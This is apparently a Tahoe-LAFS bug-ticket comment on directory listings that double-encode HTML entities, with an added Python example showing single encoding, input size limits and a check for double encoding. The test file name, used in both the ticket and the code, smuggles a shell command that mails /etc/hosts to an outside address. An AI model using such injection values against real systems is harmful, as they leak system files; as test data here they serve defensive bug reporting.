My file “zumby-bumby ; mail blaggy@… < /etc/hosts” in the pubgrid root http://pubgrid.tahoe-lafs.org/uri/URI%3ADIR2%3Actmtx2awdo4xt77x5xxaz6nyxm%3An5t546ddvd6xlv4v6se6sjympbdbvo7orwizuzl42urm73sxazqa/ is listed as “zumby-bumby ; mail blaggy@… &lt; /etc/hosts” in the listing.
That is, the < got converted to &lt; and then that ampersand got converted to &amp;. Thus, we end up with &amp;lt;.
HTML entity-encoding is good because it can stop XSS, but be careful: it increases the size of memory you have to allocate to handle the request. Also, double-encoding is just plain incorrect. Single-encode, and place limits on how much memory you will allocate to do the encoding. One way to do this is to include input size limits as part of your input validation framework.
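As an added example (not code from this ticket or from Tahoe-LAFS), a helper that entity-encodes a listing name exactly once behind the input size limit the comment above recommends, beside the double-encoding path that produces the `&amp;lt;` form the ticket reports, and a check that flags that form in rendered output; the sample name, the length cap and all function names are assumptions:

```python
import html
import re

# Constructed sample, modelled on the ticket's file name; the mail
# address is a placeholder, not the one from the ticket.
SAMPLE_NAME = "zumby-bumby ; mail blaggy@example < /etc/hosts"

MAX_NAME_LEN = 255  # assumed cap on a name accepted for rendering

# An entity whose own leading ampersand has been encoded again
# ("&amp;lt;", "&amp;#39;", "&amp;#x27;") is the signature of double encoding.
DOUBLE_ENCODED = re.compile(r"&amp;(?:[a-zA-Z]+|#\d+|#x[0-9a-fA-F]+);")


def encode_name(name: str) -> str:
    """Entity-encode a name exactly once, refusing oversized input.

    The length check runs before encoding because encoding grows the
    string (each '<' becomes the four characters '&lt;'), so bounding
    the input bounds the memory the encoder can need.
    """
    if len(name) > MAX_NAME_LEN:
        raise ValueError("file name too long to render")
    return html.escape(name, quote=True)


def listing_row(name: str) -> str:
    """Correct path: the name is encoded once, by this function only."""
    return "<tr><td>%s</td></tr>" % encode_name(name)


def buggy_listing_row(name: str) -> str:
    """The ticket's behaviour: the caller encodes the name and the template
    encodes it again, so '<' reaches the page as '&amp;lt;'."""
    return "<tr><td>%s</td></tr>" % html.escape(encode_name(name))


def is_double_encoded(fragment: str) -> bool:
    """Regression check: True if a rendered fragment shows double encoding."""
    return DOUBLE_ENCODED.search(fragment) is not None
```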